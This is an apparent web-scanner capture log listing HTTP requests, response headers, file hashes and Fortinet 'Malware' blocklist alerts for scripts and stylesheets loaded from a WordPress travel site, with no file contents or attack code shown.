Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 11943
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (9063)
Size:   11943
Md5:    fe0575b66568074463f12485d90f6d4c
Sha1:   aeedd9ab3b7874e63f647042963cb1301a38b391
Sha256: 647a6b36f3fd1f21bae171270111096b4613c23a47e6621628a51bae9c82b0b7

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2018 04:45:45 GMT
Accept-Ranges: bytes
Content-Length: 31000
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (30837)
Size:   31000
Md5:    269550530cc127b6aa5a35925a7de6ce
Sha1:   512c7d79033e3028a9be61b540cf1a6870c896f8
Sha256: 799aeb25cc0373fdee0e1b1db7ad6c2f6a0e058dfadaa3379689f583213190bd

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/odometer.css?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 3642
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   3642
Md5:    9337e9f6de01aa71f5871fa3d3e8ccdf
Sha1:   33997ae8112e468faab7b9cb1f6117932cdf3490
Sha256: 99b872249dfbe952f0725ff0114b18b060b008a4a303fb6736ba387bb69d250d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/owl.carousel.css?ver=2.2.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 4198
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   4198
Md5:    f693a8e5f50f88a4156c2d6ccaccc8c3
Sha1:   4231d6c3be6ccc8d0b71cabb68b0b99c0d40cd42
Sha256: 36aa42382294bd06e999e8ce16e36f39bdcb56e9b95bbbc97f76f1e2c0cdaf99
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/travel-agency-companion-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 41002
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   41002
Md5:    990563a675cccd4c556192f53a0070fd
Sha1:   699e0e203610f1bfbee8de33c25301673edf812d
Sha256: b478d1e54876374748289fa6d0582f97170e77aee4dee39e6e4a7a7ae3bd4a6a
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/flight/css/main.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 16145
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (344), with CRLF line terminators
Size:   16145
Md5:    6ff64cd33d19a4211efde1fba3cfdc9c
Sha1:   2f085e977f68cbe21746e19d837abb543df2d87e
Sha256: 7686fc9d81bfe932bfb241b49e5c25ab9ff53d038186fc862f3b52ad4b88ae91
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/odometer.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 21860
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (447), with CRLF line terminators
Size:   21860
Md5:    249d5d7afb25646af5fd902656e1afa9
Sha1:   a5f91602e8c407aa457ad740500db6c01047b002
Sha256: fcd52013e9154c5987cf381b8a40d3024e3be1a644d705b45a3e8144cb18f304
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/waypoint.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 17856
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   17856
Md5:    2741a3994b49d2331bb71d1e452df8b3
Sha1:   568906d08c8674e7b0c211e86191ce3c5189378e
Sha256: f6d6e80df1b38aad1cecd3a9e9a22114253fbeb9a05178ee66ca73934dbefa3c
                                        
                                            GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:07:00 GMT
Accept-Ranges: bytes
Content-Length: 3929
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (3704)
Size:   3929
Md5:    e6784d91bf2c668bc4093063c5b15113
Sha1:   687e1d2e957a821280dbd205ae66182f16dfdc30
Sha256: 194ebae85ff853319e8668f23a4c5bf371a7d9f5d550a40980ab53026ddaaa17

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

search
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7840
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 24 Nov 2022 17:57:37 GMT
Expires: Fri, 24 Nov 2023 17:57:37 GMT
Cache-Control: public, max-age=31536000
Age: 586092
Last-Modified: Wed, 27 Apr 2022 16:51:55 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7840, version 1.0\012- data
Size:   7840
Md5:    8d91ec1ca2d8b56640a47117e313a3e9
Sha1:   a9e9bafe64666f4595051a0e895b47a5fa39e67e
Sha256: 78bc3aa78faec288bbb3bf26c9a0fa4eb67b1e69da94a17233c5cab60525efdb
                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

search
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7884
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 28 Nov 2022 22:32:20 GMT
Expires: Tue, 28 Nov 2023 22:32:20 GMT
Cache-Control: public, max-age=31536000
Age: 224009
Last-Modified: Wed, 27 Apr 2022 17:03:52 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

search
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7748
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 24 Nov 2022 16:47:02 GMT
Expires: Fri, 24 Nov 2023 16:47:02 GMT
Cache-Control: public, max-age=31536000
Age: 590327
Last-Modified: Wed, 27 Apr 2022 16:21:30 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7748, version 1.0\012- data
Size:   7748
Md5:    a09f2fccfee35b7247b08a1a266f0328
Sha1:   0da2d17e738f46d2a09e6fb7969da451719a9820
Sha256: cd36de204aca2d5fa263a731f7c20009b5e3d754ba1f1e03c33e93a48f3e7446
                                        
                                            GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 12014
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (11801)
Size:   12014
Md5:    5baf42281f4fbb128816f6883fb5ff3e
Sha1:   ee59fc985c4c7d6b34ed6f8b31a1fbbbd7ad7713
Sha256: af6dd3662512bb4d13849eefd579d23ad8b28152aa6bf822fcf652412fd0cebf

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 6832
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (6608)
Size:   6832
Md5:    664c2622f0d31d62678f4830aabfe291
Sha1:   4e317239cbcadf241bf89340262542e6962ea69c
Sha256: 99ada7e01817367027759ac452a1dd11eca7557272b8940d659c07adb6bc8cbe

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

search
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 30928
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 25 Nov 2022 03:07:48 GMT
Expires: Sat, 25 Nov 2023 03:07:48 GMT
Cache-Control: public, max-age=31536000
Age: 553081
Last-Modified: Mon, 11 Jul 2022 18:57:39 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Size:   30928
Md5:    ac0d2859ea5f8fd6bcb3c305c08ec184
Sha1:   7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
Sha256: ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/jquery.dataTables.min.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 82804
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (557), with CRLF line terminators
Size:   82804
Md5:    614fd3ee31851c497e4e0e302d94a630
Sha1:   8fef6ad7bd64324dce7d88546f2f6e610c06c377
Sha256: ea1c11ebd5e0683c3267fe2bcd43efe62be79bedfa8df29069df385c5ac07678

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 46266
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   46266
Md5:    c35aa863defbd6c923f2e7966f927c0e
Sha1:   8ec26f953657e123958989bd5fc750247e7a128d
Sha256: 056c52a519e4b95b38ceb1af4637b6d16a4589553dbb7221f047a57e18315113

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/date.format.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 4011
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   4011
Md5:    ce005a19bd8c3445eff825d12c64be5d
Sha1:   4c81fd4f1d07ff8997f98dd4c5ad41b5587a4862
Sha256: 00aa9bf334f2cc56c4e3485e2b8e4f0586f213c2ecdb1024281e532c4a1a94f5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img6.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 35454
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   35454
Md5:    384f0a9bcb8f03988c104ca76e862639
Sha1:   54d46b8617636d333ff2661cdadbe84d58e6ed94
Sha256: c6040e1f9bedbe5544c341ab810da506d17a27c8c03540eec240734061e6cc25
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.jquery.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1586
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   1586
Md5:    5ab3976821382694d7c530cbf3de9b8b
Sha1:   1952422deb2531eec1cd067fb26181cf98fead86
Sha256: 413cd30469ae52fee994be6a50f710d043018694ba315f8162b6df091f3a5a33

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/site/TPPlugin.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 21022
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   21022
Md5:    b49e9a7db67f1838a14d1777c0987551
Sha1:   ccb30d8feae4b749a2d91f6f463f0977e4f3b9f0
Sha256: 86b7c835445266a77b34c78f29a551fcf7a873afa5b883af43109db988c860b4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 36176
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (35951)
Size:   36176
Md5:    cb1f7699be677def94bc41a5d9da4f82
Sha1:   b1aff76bd04ba59abed8e19a71db339332d9e15d
Sha256: 131c19ca61ef3ab0c3199b1db78997ec2efb8327722cef4df46f09c4892d273d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/travel-agency/js/wow.min.js?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 8416
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (8385), with CRLF line terminators
Size:   8416
Md5:    e1f1ff6897992a9165e8ce009b4039e3
Sha1:   e297207404fea99863aea60a1dcd3770f8ecddee
Sha256: 37461d9b50fd93b2e6d064c4aa48cbc16d5b1e82c27f47270b87a39225cc00ac

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:07:01 GMT
Accept-Ranges: bytes
Content-Length: 1391
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (1391), with no line terminators
Size:   1391
Md5:    570ae0f3c201604926ea599d3d1f6c04
Sha1:   2c29243a73660964d4712b969d2a15e27777bc14
Sha256: 5138d39633dc69fcd0ed7f33a5e38dc339123f682fa7f5242066879c2bbc8c9b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/travel-agency/js/custom.min.js?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 674
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
